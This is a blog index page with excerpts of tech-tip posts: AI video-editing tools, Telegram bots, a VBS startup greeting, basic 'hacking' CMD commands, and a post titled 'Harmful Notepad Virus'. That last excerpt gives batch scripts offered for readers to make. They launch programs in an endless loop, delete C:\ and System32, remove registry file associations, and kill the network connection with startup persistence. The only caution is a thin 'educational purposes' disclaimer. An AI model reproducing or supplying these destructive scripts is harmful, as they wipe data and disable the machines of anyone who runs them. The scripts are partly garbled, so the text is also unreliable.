Posts

Featured Post

Unleash the Power of AI in Video Editing with These Top 10 Tools

Image
 Hey there, Welcome to DPX Tech! Here are Top 10 AI Websites for Video Editing Tools : 1. Filmora Wondershare : A versatile and user-friendly video editor with AI features. 2. Synthesia : An AI platform that creates realistic videos with avatars and text-to-speech. 3. Rawshorts : An AI tool that converts text into animated videos. 4. Invideo : An AI-powered video editor that offers templates and stock media. 5. Pictory : An AI service that transforms text into engaging videos. 6. Flexclip : An AI solution that helps create explainer videos and presentations. 7. Runway : An AI editor that enables collaborative editing and style transfers. 8. Kapwing : An online video editor with AI features such as Smart Cut, Remove Background, Text to Speech, and Magic Subtitles. 9. Descript : A website for video editing that uses AI and provides a number of cutting-edge capabilities. It is made for audio and video editing and is a great option for podcasters, journalists, and video editors. 10. ...

Telegram Bots Everyone Should Know |Part-1|

Image
  Hello Everyone, we are back with Another Post regarding Telegram Bots. Telegram Bots are very useful for daily use and effective in making our life easier. Things We should know about Telegram Bots that everybody doesn't know.   1 . } @SongRef Bot :   Search and Listen or Download Music/Album from Streaming Services like Spotify, Youtube, Apple music, etc.   2 .} @Screenshot Bot :  This Bot can Provide you with the Screenshot from any Movie or Video files without actually Downloading the entire File.   3 .} @Open in WhatsApp Bot :   If you want to Chat with Someone on Whatsapp without Saving their Number, Send the Number to this Bot & it will give you the link which opens the Chat with that Number in Whatsapp.   4 .} @Is It Down Bot :   A Bot that helps you to Check if any Website is Down or Up. Just send the URL and it'll Redirect to you instantly.   5 .} @IPapkorn Bot :   Get any Movie or Webseries on Telegram ...

Make Your PC Welcomes You On Startup

Image
Make Your PC Welcomes You on Startup Steps to Follow: Step 1 : Open Notepad and Type this Code :- dim speech welcome="Welcome Master!' Lets Play With Security" set speech=CreateObject("sapi.spvoice") speech.speak welcome NOTE: You can change the message "welcome master, let's play with security" to any other message but not to change any other code. Step 2 : Now you have to Save that File by the Name "welcome.vbs" or any name but Don't forget to add ".vbs" as extension. Step 3 : Open the RUN Dialog box by pressing WINDOWS + R. Type "shell:startup" in the box and press Enter. Step 4 : Copy the welcome.vbs file and paste it to shell:startup location. We are Done with the Work Just Restart your PC & Hear those Magical Words!

Amazing CMD Commands Used in Hacking

Image
Let's see how to Enable NetBIOS because we will have some fun with it. Open your Network Connection and right click and select Properties. Then Select TCP/IP and click Properties again. Now Click on Advanced and WINS tab . Select Default for NetBIOS. Now back to the main Local Area Connection window, select File and Print Sharing for Microsoft Networks and hit enter. 1.} PING : This command will allow you to check if the host you are pinging is alive, which means if it is up at the time of executing the “ping” command. ping x.x.x.x (x is the IP address). e.g. 8.8.8.8 which belongs to Google. or ping www.google.com (www.google.com is the website you want to ping, but you don’t know the IP). 2.} NSLOOKUP : This command has many functionalities. One is for resolving DNS into IP. Let's say you know the website URL, but you don’t know its IP, & you want to find it out. Eg. nslookup www.google.com (www.google.com is the website for which you want to find out the IP) anothe...

Harmful Notepad Virus

Image
Here are some of the Most Dangerous Viruses that can even Crash or Kill your PC. its only for Educational Purposes so don't even try it on any Person or not on your PC too. 1.} Application bomber(.bat): @echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x   2.} C drive cleaner(.bat): @Echo off Del C:\ *.* |y 3.} Delete Registry key(.bat): @echo off START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :message ECHO Your PC has been crashed. GOTO message 4.} Delete Windows system32(.bat): DEL C:\WINDOWS\SYSTEM32\*.*/Q 5.} Disable internet permanently(.bat): echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindo...